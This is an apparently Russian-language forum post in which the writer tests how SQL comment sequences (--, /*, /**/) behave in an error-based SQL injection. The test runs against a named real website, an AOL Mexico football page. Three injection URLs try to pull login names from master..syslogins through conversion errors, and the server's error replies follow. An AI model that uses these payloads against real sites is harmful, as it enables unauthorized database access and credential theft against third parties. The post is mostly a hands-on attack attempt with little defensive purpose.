информация проверена? Мне с трудом верится, что такое возможно. Ведь оставшаяся часть запроса останется незакомментированной - соответственно возникнет ошибка синтаксиса. Взять к примеру вот этот пример:
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))--
Пробуем с /*
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))/*
->
Missing end comment mark
Пробуем так /**/
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))/**/
->
Incorrect syntax near '='
Очевидно, что в последнем запросе возникла ошибка синтаксиса.